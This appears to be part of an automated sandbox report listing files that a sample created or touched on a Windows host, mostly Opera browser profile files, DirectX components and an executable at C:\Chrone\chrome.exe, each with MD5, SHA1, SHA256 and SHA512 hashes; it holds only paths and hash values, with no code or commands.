SHA512 9902a5680939cb2f79df62c5a059f4813c91c42d3975cd7e9bee957518ee170118dacb98ba4156f8b1484cf509e3addb4da3276bf0dd06072e74f53f9c8536c5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8140372396cd53c08d9e4c5620740055
SHA1 e6fcb43372224d382be519246c65609f1f2835c4
SHA256 83d7924d0d604f5a1406dbe9ff64f40736236c34fece1870b4c3fedd542230d0
SHA512 f1dec13d4fafa014091c0c47180e5429dc682800ef9d025fe4482d35ef190d1e13dacc45400a75d90fa6ab4c7ab03182458d32003f1dcc63820989d133cd77e9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41f8aca552f65a971d4fbda196baaf1f
SHA1 d99e3f6a4a88dfeb407a76c06c52c61d53fe531a
SHA256 b1e778c842cca54795dab2ae3198bf88faf1515c4f6e625b1c3c2ba0a0ae86b9
SHA512 79ba4c200ec81f6d0bfd76f9f5dc4ba82986e992f637532e6a89ffcd7c55b625936922aa04d32141afe10814b0a89b0203da37dc25ed0d2006c54de476bcd853

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

MD5 3dd843f0f2a16528b5e2bd327c67d38a
SHA1 216dc8be0deec32a6fbe0ed2461b7e6a3a8c3c18
SHA256 f5d4665cee6571a237a8ca8c09c5e560c031735ea2c4e55065677e44257d0031
SHA512 6dde8e086e3076dc6aa1e86724c66483f6c86cb6d06dcbe30bc60874ad1a67053bd374ee4c4c3dea7f30ea08ee8a070740ff43ba156569d8174469d82c135b04

C:\Program Files (x86)\Opera\installer_prefs.json

MD5 536488a0d141ca16e05924dddaa747b4
SHA1 6832cd9fbc83a4f0ed8432d7c3d36d12b2aa66ae
SHA256 c954cb13e0c9dbbf303674b42af557b28bfccfc9ba6c9ca6513d1f8a62a37de4
SHA512 c0d8f5b49786babfac9c09d79a2cece9c475aac0a4c25fb1fc42f5790adb80b6d5bfec143592b15bcc41765728ca806063c7a9de50da75ce2b00847e5a533421

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 dcb25bbb460e6fa6d8d6cebb6d6fc839
SHA1 9e7467cbf601526b37d3d52cd2b34ebc9c5c7547
SHA256 c4fdef11fa232c1cadbb25cb1543bc095823207993b38df225dec17cd9f26929
SHA512 10204a75b630db515439ffe00bfa1462c37813f4cf31bc476c235cd6ab5770b9a45d7edf68806fbb917b1a36541806eff673d43194ca369868739458b4e654c4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 a1dedbce48b5250deb370999de1aa202
SHA1 a3f5b1277536b15ebeda068cbfdad595dd5ae1d9
SHA256 c0f740ea3f43dd302a6f81191f4e44964c758a3e36c508b9c7121901abfc19db
SHA512 025ca45bb9dab5e82585c8091ec36139eacd27ab70f305ac83f5c83383780291a6810bdd30606a92e1a73fe7bfb626f2ed75bef64f6daa6443087dc74bdae5c4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 6be032f3d1e09fa0cc28d2c41ff86d4a
SHA1 a132fd29e481dce4550789cd9b23f1071484c4a9
SHA256 4fd3b268391962f0039eedc06af82b8d6677427925775e5b329a6b8d674d3592
SHA512 a4582696dca352b49dcc0a0b60bb2b35000487d8dfdbe9bdb75dc04c36d14a5e90696f6971b8d09b3c856d06ece19e7dce40d2a4850f49b492df001076754d8a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 2a528bb04337271f873c11e7d4e6cc84
SHA1 81e069bff652b063710225aa5da1096d6dc31aac
SHA256 95b4359c24548cd1cb9d5affaa77e65184e361b4bbbc8d9591087eb725e2571b
SHA512 8b25da435e67f18a4261829258546b0f8fd4ac69b27d2db5a796c38da74c229394fe5496c88ac79a5aab673d04eaf3043f9d7e152275a328ab749481a31bc0bc

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 9ce7dbab55153a93fa1b342478c70017
SHA1 839c4477b4e9030e4fd957f3ed8e3a65d6da7809
SHA256 59a99d2ad9f083138746d6bc6ae38fa71ebbc95f535d074cf4538a88040d920e
SHA512 143666f40dc7a1e41ea78d703d22dea18d795c8371f7c21685b21b8c3a426c99ebc4db21fa5bea98819bc307963fa9e16bc2f1ec2d20fe7fae716abf52039733

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 d3d71ac7919b3708f0faa8f02505e250
SHA1 c9b70db8d91bb156a847300261d9ef3ada797439
SHA256 191c68077c47d57d609ed41b12539928b537d121f0488cd34358368b71cedc93
SHA512 836cee88167ee1e6101881b904f799a450c1c1b5c5ecfc1560e4f5347d87833d582ac08c917d10dae8a0c9d8f9fe5c676c262a2186f8984975a01139ffb37a6b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 925e299eab5f80784031a2a836ccea9c
SHA1 0e0865b5f0fdb9339c899e90c2ea5210fa75e5a3
SHA256 72233c6102d86f06b773e7c0b05260e5e1845a10219416562971cca6cf9ea731
SHA512 62af305ad872a94be1f1777a59a7c0d5e84d19d8916e7e1e7107b72ec05d61504a4644e8e680d5f62df3c9ba291a7298c45d3f4ac2116c6f384d0d554dcfa7d1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 acb899e326533bd7aa406aac4459581e
SHA1 a266c5207d0cfa0c682a8c830943a3c9ad8e881f
SHA256 3ef1fd2aa4a8713b4d5299774a52f55b4a307c08052d73187ccb720fc4e2a92b
SHA512 4d6933f2fcd0971b13fb8833773bbe331b5f92b74b2ded22e363311924052a30a9017a3efaf5a8230895884f6e8fe883cafd062554d9e84271125d0982ac1384

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 2343e508eff4535db208d4c84f057ee0
SHA1 296dbf947f599731c52d58816ea2d6560b26b400
SHA256 85fca4c825f7ea1dce41d2e62dd22107208f90f8a3f38efff9f478e02a041cf6
SHA512 869739b61beae55b0b8c19c4257a6e09bd84dbb34409d4e35a0187ce8a0f1041c3df9ee308c8f9c7ef9c2bff761f1dba08912402177029a10afaeda407f7ddbd

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 ef07ba81dea3aef5b0531a095cad6fab
SHA1 3772e82060b9a9d6e34d85deb395010f9492da85
SHA256 58149ed3f86f2be5456aefd7588a74a155972cca36efc86c24ec88b18b39bf96
SHA512 c1c9d23f56950180b834530904edacf2b11328099543509a0b16d763a3791dac1a195a5e06f4c36e2e1e6d49c0d52a00a53758e1f439ef6ea971144bb1f1c08e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 da66ebeddd90f408021e505da07012a0
SHA1 08b3da7562a02348b76e2224ea79d64010dd092d
SHA256 bbf08f1be2a11fbc5646db28da2946fcc0c6afef6889a4e056f0f2ab469d7b0a
SHA512 8e9344b6ead4e9e3f78e05a7ed74f8ad477378430bb42d5cd6f22dce5db2b2732aeb61292f995faa66856a2f10a3fd42b86fd82d3952823791392662c9a3eb11

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 94924b9b05000a039bef28fc960915e8
SHA1 4df24aefcf6dea874bd02c85b24b4e5148052740
SHA256 99905c8956c7d2396ef76ed119336b1fab64ff6b37f882faef5aa6e105bffcff
SHA512 484fcac89401008b1a1307a2aaf70aca1f3234460b97e26d7f8791bf0fcc1893ab54ca003c4167a4c7a0bf77a476427f0f96dd8d45cf1bc4f7f60f3334150db4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 0afd7827080c8fc8720655de3f0bba90
SHA1 51798fb61ca19316be06982593b5758353cc1521
SHA256 a00864237800275fb89bbd71fd7d58ca960faefa0077b519dfc9d75ea559c0a4
SHA512 cac57c64838b77b294b69c2727b074350f3b8d2a7b9cc862975a5f9175d25dbbc6c9d48347269205f3cebf7a9e11d3a5848a42745651c12ca065f64f6e301448

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 2e6387491472b35a8d8637e3653e2c15
SHA1 f87ebc88076f884acee70a606dbfe57779e0611d
SHA256 5a0cc56d6702d3ca843b16651577653cc004219cbad1da0255d908fb39e03863
SHA512 d028d68f77e79bf3975e67d545d4a9e7df20bafc68d84baf5d77c26e75d82cac215e39ec2a023ab02a7afd9b4dd8181da16140caa971795f8530bae6f50980fa

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 ac3538f96bd0228ce055689e140afba1
SHA1 9dc13bfba91bef46a54ec758d6994d5ffd0c6434
SHA256 706fecb3b357add756adc278cc701de251e03867e13989957a9a1f33c8822520
SHA512 1f498e7031cd8b8dfda3b00094726c4ab6d5aeed17625c0c7f9351adc407a037f0ba082710d7bbe9980d2afdc6fd3efbcd7c99585d9744ed08ae2bdcf405a7db

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 ec6e8ed3dd91130e0799f3f84f474f33
SHA1 b80b4d33cd9b932cb60f11195d38ece0b29590aa
SHA256 c1b0de132fa6e2d1b27f6cdec0ecb55a1c5ecd7ffccd3b766c7dadfebcc3793b
SHA512 f04036a9a4ff139c827dc451f5aa3412b1799875f384dd49620334f0666c793bd3ba946764aede411857fb7774b73f18a3a0ed1f07583b54c7c101c2da9014e1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 ae62bb5262b325dba57ebfdb7bdf75a5
SHA1 bd790a7926123b90f2f58c4dd8424a3955b3247c
SHA256 63fba68ac5cc5eefd1ec6270a930f660a19ab226445aee6d6f8aaa88ce09846f
SHA512 d29a051d87e420667c182c22288248d3a62195ec12d42cb696fc1890c4c4a34ae2fe522dadabb7572e9d0aab21880b88df7e8fffa450e5572b4f2dc096ec0029

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 dc321d5907f0fbc404a354be53997f1e
SHA1 7b0d8a0391f8c52edf80af03b9b86876407cf4b5
SHA256 0f637adf36ccb0290b1a911c38f1714cd1d0df51c772ccedef16da436a037b6b
SHA512 f53ec464211e725095ba88ecb3b645c6e29ca83773d2bfd75691148cdbfc44fb1cf528d26dcae20d3e9d80ca59af6ad718927e60362d16f416ef0222c033265c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 b21d9a0562660c23c1239c6bfdf8bdb4
SHA1 a233079f0dca8367ce093fe5934c9abc6bce5f1a
SHA256 a98c5727a212a3acadccfecbf2c53966f62bcefe887cdfcfde7d7fa99236ebae
SHA512 d2e7a618c4e86ccdc0545f2c819758a27176abca5c86f0f30f1283015cd1f499b850e4c8db97350903c9d6c0cd8de644db32c614436d62284a1a593ef2b6f6f0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 2b195f2f7d6693b428c35c40f8cb173f
SHA1 8f05131231ebdef2979bf9fe78691633966c9859
SHA256 af6f65ff160c0698f0adaebe981bcd443ddf6c804f8f6de9cb4b4e1656248815
SHA512 2c13d70d3d09155feb9a911e71c34cca48100a78b28e9d86e4202847f1b9f980d9fe60d309f60e2b27b81e21b083fcb6f34474bb92c74b55093c30fac274bb60

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 c438279b966cbb41ccb8456731013c90
SHA1 af7454b4e1c60dba0619f862694741fb1b08cd32
SHA256 cf0d3dbb7f14e8aaede7a460ff54c396099652f737bff5a69e6c326ce30751c8
SHA512 16afb7bdd048c838ad9b07497ac31da27b05b819f832ef3d01fe0c6586e86171f2e45ae632558ef99b8c94a44a367f1a923fab80d5766061050e8cee14078e98

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 c06b37d06b2a7eea4da40d52eccdb036
SHA1 d7ae759523de7ec660f1a9e88e3bd7fa84bdaf3f
SHA256 6ec89d6f8348c9e61a1213c52dcb10715689a8fbadfc1f0c06ed051fc54a3063
SHA512 90bbea982277bfcedc8de2ce20910f3673d1c7ed3549288ae35efb19494a8511a69e9cf825f1ea6b6289b19126c149917279ea2086c6a1f59c40e2f7b98830be

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 be8a64b4c27d647ad370d5c5751d4d45
SHA1 9f4764411aef86053f5982e6bed12501d481591e
SHA256 0b3321fe1d661b3941eed4d729e3a283908ac3ded091e7f27d0c3db9daebf602
SHA512 909ac094367538506e22a7229c96e892ddbbe5a282ca053d8ba4a14daeb4e1afd5a0ecbc516f6c1c747b0817b3b996d97c52c33a57e7b14d475141dd39403690

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 e1f89aeb0f7eb7e333fe619ca93544a4
SHA1 a17f028da580f0f91474f114b800073f93cc42bd
SHA256 dba91be5119bbd9690d322006e0e3c3f6fb05de829e8e612146a44d6c1bfa75e
SHA512 a5106636ab7d0b2555db4924f2334f95c8f260d2c8e0a845515eba450f41ab3dfb34e1cc3135f8f1a419a2509e116e8f922a3b8b707484fdc83220a91a8cec24

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 3deefa28601234acade4bf271320af5e
SHA1 402378f1c47f53555f4bbab08f39ec24644b0f88
SHA256 f482f0b6c2823a50d83d1d610ffb1643105e9c14195d452391c79e7eee316265
SHA512 da21534dd6d4e4dd6bb58afb485614a8e5de85933d6f451fd1489e202220d1b21c79cec7d0c258e8e798b58e1f51de63869a27448f37ef3f6c3f47ee6d020c6c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 741a19e442db6148dc11372039db8da8
SHA1 73964dfabf7eb4663aeedbdfdcb455ea50020898
SHA256 a605adf44c1d7d8f2397931bdb009270d810b0949644f0d752178bf02e3f0101
SHA512 74453ca1eaf74946c87d95d76a0d777ebceafdcee713084cca9d862d42a2d91376c90cc7d206c3cec48b607c29b3599e417a4abed0f0bd7af850ba262d8a2dbe

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_68edf0f7-3b98-4ec2-93e1-847369f5eefe.raw

MD5 dbd07e53975299b64f67f9e1c2a73911
SHA1 1b023fc6c324888e7c8a691ef278de9abb583a2b
SHA256 bfbd1d07f6e4b53e2573b9aa4328567330b944b5e6cd9303b2574615f56e93fa
SHA512 3f9ec7845e1b8b8feffca6183fa73c2482c79181e495a2d4db568cbb7afa0eebf7c8ced507f9afbd7ed80b2f0a438a69106a1d3c3dd829b2acbdc223b1b72474

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 b79a7adcf17c6ce57cace2aeeeb076ef
SHA1 0c442944eda91cfe115e6b425073053b146923b4
SHA256 20686969c5ec69b8f3d2175cbc779280ea22f44597478c239518c5182bb55a8a
SHA512 6bfb51ff564538f4de0d3fc1fb5df401a770b22596dea510681d4b2ce82a013ce6960992aabb24b4dc19cfb1691cdd0e9f381d5ba733b422a5a015c632ae32e5

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 630a4253eebbee0ffa97b8913bef702d
SHA1 ff030dc69cb7cdb05901ec73f41fee52533cd727
SHA256 ca575602a11b4bc2d9301e9a7c62380db3ffc35a312574ba3127ca22dffb3585
SHA512 13768c8218cc54780f3663dd633659a6dd161c536b177e3561d0979ad2424ace358b0bf953746b7cb8c13936c8985e4ec97cdaf6311f976dc8f4e2972976c00b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 5fa9e3bb777130455a0cb146315a033a
SHA1 1a73dd42446f8d75ea8b742c6b962a7e7b74560d
SHA256 107b27fe0b5e8ce47aae5aa2f27ea648349e648d108cfe8dd2b0980e7c1100b2
SHA512 503514666fbd55b1888d012e4a9ad8cd7b1e330cc4367e326b57f00ac8e6c055424e9df70dd5d05fca06f78472dd40759a4d1f4471cae903ca5ef3f1ec4f81f9

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 b7a2dcd727e34be42a3cdc395aa549ad
SHA1 113e0ff56662b9c8d8781e1322e73487d2f7fbf7
SHA256 d9cbe19ccb0669d64bfa26d63475ffcb6f1fb15280fe5d7aa73f259289d34a8a
SHA512 2d5e3c7eee3222839b636ab11a68e23c1f54e1f70574bc195a034491af7e23e76dd0abc881f1558a9c421b0b63a4e3494f55f17cf611650ad127456365016df2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 31f8aa6616218442f41249bc8dd2449d
SHA1 2e630c8b0f8e5bf0eb83cf34f712edb9a1864bcc
SHA256 9f021701add6a2548f31df885afd22abc4696f790c8b7f3c38e857e167295a12
SHA512 c729f9c7e920609d912d66e6c7b6011680c347ff5fcbc08d0ec5d01c00329b9ae3632183914594ce3582dd40f5af50fc46fc52cc2b1ff79693d979c8c9d7a057

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 6d13122650df67011adb6685d7f139fa
SHA1 e0e438dbc633d288d5a228a2cf7668e8c09e1482
SHA256 955c7e97afd5d869f055f1173ed5e3628797cc2a994428b56334a3a7b3270e9b
SHA512 4658851c5c4ba331cbadf39af6a17984402ebfdf9307cc3703a938db95b4bbe497fc9155fb949a7b9805c5c2d7319f120314a0fb82ccd6bdc870d2d97fd41951

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 e5ce420a664fb0fc8f5aaa238a8393d7
SHA1 702e08efd774c4a66c2293be240577509ec7d41b
SHA256 94ab5263a0b715178e9bd5ae7fd6aa31876ee3fb98a57c434c11de0c0a477d2f
SHA512 292fdd74d51556e708f0731a0fc0bf0dd35cdff4678085d38c728406e3ad1a6a6aa9ebb2aecc0bc0f6e85dcb6726aa8f3d8eeab75945184c3f670d645ea58724

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 b332113631878f54e782e902e548b8c5
SHA1 507ba299af941c748cfefe48d00b47d20ceb471a
SHA256 59d565ce7a1d29d5271bb85d7da90125fdab652413b6afe99345a5d1e9bbfd24
SHA512 4f5435638fb55308b6d0b8bf48f0e954a6cf7843b1062d98a4dedc1e4b3524cd1957e9eec417436b099b9fec85fef98599208fb3a8903bb267bb1476515770ff

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 cf4495d08424ecc32c7b401cba874e6d
SHA1 91d06bfc936aca7293914b5741e8145eb44cdd36
SHA256 620f6de7d35fc3448a5a52252e2df7174d81593ec4682576ce16a723b0b01238
SHA512 0c27dbc84e74f9c64fbc9e66ff4c0557f889b318b9c6c1feee3362bb2730a5128f3a4e3aeed7ead0d56ae4666342c2fd9ec0f3eb6afba13372d18bb8184692c2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 abb6b20606a2474980e3b996371d5d42
SHA1 f2a67549d763cb093cd2e413b2dd76b2a92ad3ae
SHA256 31d7ebbab22f3ba81b48c269f869fb191ed8c21cc57e88cd57e47df607ef8827
SHA512 0b877cc4d49880269022ed5cc74d4601e9b08899526ce7b368bceb88e1e1a45865f0cb90752b74f108f6a2fc5b64fd7cf53ed8bfbb483826690daa11d66e1c77

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 1b63ffce8000a0d861187a32fe8d9d2d
SHA1 12fa719413629cd8a4c2613d90fbf5465ec4bee4
SHA256 26f96e95d1ac4113663a5eb576db4acf352a35abcb278ed83ef5ead4963ea7bb
SHA512 5982b8abcba2d3aad6457b3b36d8cabecd4cc5e23486bdb6bd59fa87bfb5e18b41dc0d063f8082d117b9ebbcb9fd9cf3d4cf5a62b381cca706a6a54bdbda1abb

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 73bd123de851708764d13ee0505d30a4
SHA1 122e5f0a3493f83a55ca4966b619390ce4ed7937
SHA256 1b83dd1f1a037c8b8516fd9f30e62dbb7cd2bd6278ec3c1aa384498a2cb52a61
SHA512 6782744a2df455b97ef7797505526f585ccd19bec2deda3a17e4025d3b7de2cb9fb9f71f49caceb26a16e80a7aa694abec7c129f76da85a7af282ecbb18f7104

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 faf96e4f221f98e136e19b390453adf8
SHA1 0f07e3a6c9b71f6f8c77b68f11a881e749fcc148
SHA256 583d934d4ae3dbd0a8ae221af1873a2dedf5fd81176c0199151ccaa07cf0ac91
SHA512 39e318c61a5adcc0c73b21173451683730f326ff337f9a64e8c6d075b634ddef6b06c26b26596b9fe4bd04d13fa7e34c5325522ff780cf5cb5accd8ca3a76322

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp3212.0.518245776

MD5 6a6972f6ae7eec263495b3baa3e4b0b2
SHA1 03277d932159ac162296e49231e537915695ca92
SHA256 1358ff4661fc46050ea138cff318cd11459da990e4331882a6b62276240935f6
SHA512 32c7f9a2a6be560ca60c7f6f43ea1ee4c98e0ff59231643cc99a71461a829e88280acc1998aaa8de25313589485cad506690ee4e58e7d0a9e6a0893e654819c5

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\suggestions_cache.json

MD5 1fb2b817ae7dc469df45dc427682f6b9
SHA1 8ce58276d40033834591f882ca984da08d7a24fe
SHA256 2a107c74c79a69c0bc8f879d00e652d3778811566664e78e70caba6735cc2c97
SHA512 c4b5571a49c8cd434f1c5ba4303c2722947d6b7e63b967d78ea73ce54f7460b254bfa746deef0788b1137ca5de1d1a38bf7bb8591f99809e946faa36f41f5ef2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\3805eb66-1d2d-4879-94f5-4590ad860a70.tmp

MD5 57ab0b92db71fc3f8ff70b58ae0b2efe
SHA1 b98403fd8ffd846db2eddf194c87f7982e710831
SHA256 d2e5e6fea4cd1ab216b076e3752b97308f70d25b09b6a8c500da9bd5ba190baf
SHA512 19dfa35a440cd28b84fa03f780644f03e52c40c796970ebbb04f830fe9ebf9bbd9ed3d4b824a623caef3f2746593e7a71f96c0b465e8c149fff4f6e3b5c776db

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\edc44354-fc30-45ec-80ac-197ad0ec53b9.tmp

MD5 540827c7c52e07259d0da82938a38ff3
SHA1 e7c0a1721d30832cca4f0d221cad03252f522aa2
SHA256 caecdd22af6049c5f1b0568897bc8e7392345351316af0163ee6fcb16c9acb58
SHA512 bcacd32ab97c346141e57e85e8b468da56e9232d53d89e423f362d0bbe46af1df09bb47ce47ed7bab323fff661b5d4cfc67557427d1c32f18109d215b584e619

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\1161075f-eb4c-4543-99b5-380cc762eae4.tmp

MD5 4d8ae99827bef6b61ae0aac9b7403b91
SHA1 3be5c5fa14fefce86b1d7e33806c43ec0660367d
SHA256 66ef0960891a0f44d8ad6ac6d2d3db2b7f0a48ce0501f50aa3a08ada990ece89
SHA512 b02d60e7c99ae45c064e5e345790bfd708d026007ade5ea032512152b2de638125a52c1c9cf8996f7e6d0ad235bca63f4ba94b99cf2345b9a5d2fb3398ae09bc

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\9de71af4-5fad-46e0-8d6d-cc7d7aa235e1.tmp

MD5 538388328d5038cf2999239d3002a42c
SHA1 c0279e3de5aacd8db9b3f7e59c00555624ccdf47
SHA256 7500ae716014b0dca86749ced8f3ce65c7e6549aa3c0848adbc815a7225f01f8
SHA512 caf90527712e598e29b8b5e1605142d7d55456d2c8a9526e4c7cf2dd4f2e918fb499df3c805757fef93d5acf0648a7af7d5db898f19b5bc2c2390b28f87ffcf0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local State

MD5 3da78be7be64ba6f0f781052d1a3e2f2
SHA1 51bf3f03caf9c70bf158e6d0f75f02808c16e4e8
SHA256 b6d3319583cf09f42c0e1675ca08f386774315daacc06d3d266933d32406277c
SHA512 4869e353f58ff3a19b242b735d2e0c1b5c644c9327f6c1a0c6d8deb449f0371eb609f170db4c49f41e09e9ea394904d11a000928fafb7dcddb49ad69a389794c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 0a7bbeb415b9d04fc915910bbe59df47
SHA1 a67868ed1b8e5b9e1dd2ccf3d08d0b469cd14af7
SHA256 cd04abba49ebb06072a1aae0223ddd446723ed294a6462358d36386156dca53d
SHA512 b0c5c76b98ffd197849f795c27dd82ebde375365823f5676584fbb0da56001c49e3f16262f388714e925e72bd1cdb6d871af9c3776bbc9ef1c98c8f24a11f107

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Secure Preferences

MD5 26933841f444713946bbebfd8ba1d443
SHA1 ca44f883f709b76b6e6cf661709cc697ee344028
SHA256 0a2f0fa2b37fe74c1b8aae03681dbbaad9337c77db9153de32e79f1b7f78b815
SHA512 72fb2b86b22d9300bf74fdfdc8c8e54c1664de2d0904a1b20b1af89efc538cadc09586b87905ca605e920c3ca1f7a0ef23a2f7b6676b3580ae2b8bc8166725e2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Network Persistent State

MD5 4b745f0e7bb3887ea61a4965e2fe944c
SHA1 ba74c4af2aca34969238a598e81a24a4d52d1575
SHA256 d6d1cef968d16cec8aa5dba68553ade5da9c12a6228cec955cff4ae7a81da4dd
SHA512 4562f63f03b5b69036854a2b059603d4f89c0cbb895e75733a09d05ee4fcc88238bb9fdec07f79860d3ce5d662e5d1b26523fc3caa8b05ed1fefccdfde754713

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\TransportSecurity

MD5 998ccfc6d294c6517dc3536f0ba4edd9
SHA1 e5844b3575ee18fb1c0df16e610192dc765f3f7f
SHA256 ce155f2080d0ec966e5c7ff40595bfa9381701fe5afcd742683be7e7873dab98
SHA512 e1c0a926135726e63321a422047d761e9a6badead829d709e59204b669b61eaa6fd27931d33f957f7170589fa779400a97046ff2a8c23bd1553b44965cbc3120

C:\Chrone\chrome.exe

MD5 dfcc3d7bb6d597d7aec366c2ed9604ee
SHA1 2475a9fdea8ecb2be0cf30de408116163ab5081e
SHA256 d9dbd015979617e68e399e1cb29f0a793d4e9efa1ce0ce6f72a46c1928457565
SHA512 7e91390fc59f65899087e5431ae99267f70d80944e91e6ebd8b18c429619195eaaf63bd9a736b368788c997554e7e77241ce647e63539471890d3e1937c7855e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x64\Microsoft.NET\DirectX for Managed Code\1.0.2906.0\Microsoft.DirectX.Direct3DX.xml

MD5 dae21601cf373590e5ab8eb13fb79b7a
SHA1 bf15bbbc72980a5a506a8333f150f9cbb73bb35e
SHA256 59986eba5cb424d9c388a2d23e4581ae465d3ff767eee913f6cd07dc1f9e7254
SHA512 c9d0b272634cdc5f6dbbc4789789d1d9178df9e90cc906be90326384699d49e69ac095a802a90d02ce84f69f7f9b0412ec2f3582709100912e23f344bb1d0d4b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Direct3DX.xml

MD5 fd193c64b3fbf6210d4eb6aff167aa04
SHA1 ef593c6935e75e55d0badd0f6405d05dadb4eee3
SHA256 80423d7cfaa5945cbad4cf96b65724c398ed503b4ff70b6951d8609987f15f7d
SHA512 559e9f49ea94e0daebc2c78a48cea6ea8ab81cff12a303a39fab82e22554daa929392f308047575726c74760f891fe8f9ca6f0569689647d8f4bbd1070744b3e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.AudioVideoPlayback\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.AudioVideoPlayback.dll

MD5 75933586afd94ea24c5acd3dbc89a272
SHA1 970fd4b49d1368330c10279798991b901a233c2a
SHA256 406f473429573e9f0084aae125ef8f19f59291aa4c33cf7d40e7d996995a3238
